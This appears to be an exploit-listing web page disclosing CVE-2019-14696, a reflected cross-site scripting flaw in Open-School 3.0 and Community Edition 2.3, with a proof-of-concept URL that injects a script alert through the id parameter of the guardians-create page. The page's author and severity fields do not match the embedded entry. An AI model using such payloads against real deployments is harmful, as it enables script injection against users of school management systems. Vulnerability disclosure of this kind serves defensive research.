Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2019-14696 | CWE-79 | $300 | Medium |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
John Doe | High | Remote | 2019-08-09 |
# Exploit Title: [title] # Date: [2019 08 06] # Exploit Author: [Greg.Priest] # Vendor Homepage: [https://open-school.org/] # Software Link: [] # Version: [Open-School 3.0/Community Edition 2.3] # Tested on: [Windows/Linux ] # CVE : [CVE-2019-14696] Open-School 3.0, and Community Edition 2.3, allows XSS via the /index.php?r=students/guardians/create id parameter. /index.php?r=students/guardians/create&id=1[inject JavaScript Code] Example: /index.php?r=students/guardians/create&id=1<script>alert("PWN3D!")</script><script>alert("PWN3D!")</script>
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.